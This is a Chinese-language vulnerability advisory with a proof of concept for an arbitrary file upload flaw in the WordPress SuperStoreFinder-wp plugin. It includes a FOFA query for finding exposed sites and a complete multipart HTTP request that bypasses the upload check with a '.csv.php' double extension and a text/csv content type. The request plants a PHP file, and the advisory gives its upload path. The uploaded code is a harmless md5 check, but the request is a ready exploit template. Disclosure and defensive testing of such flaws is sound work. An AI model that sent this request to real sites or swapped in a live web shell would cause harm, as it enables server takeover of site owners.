WordPress SuperStoreFinder-wp 插件 import.php 任意文件上传漏洞
一、漏洞简介
WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台,该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress SuperStoreFinder-wp 是一款内置了精确的地理位置,让客户以最简单的方式路由和到达您的商店网点的插件。WordPress SuperStoreFinder-wp 插件没有正确检查文件上传,攻击者可以将Content-Type标头设置为text/csv,并使用双扩展来绕过现有的检查,攻击者可上传恶意文件获取服务器权限。
二、影响版本
- WordPress SuperStoreFinder-wp
三、资产测绘
- fofa
body="wp-content/plugins/superstorefinder-wp"
- 特征
四、漏洞复现
POST /wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/import.php HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=------WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="default_location"; filename="test.csv.php"
Content-Type: text/csv
<?php echo md5(123);unlink(__FILE__);?>
------WebKitFormBoundarybqvzqvmt
文件上传位置
/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/test.csv.php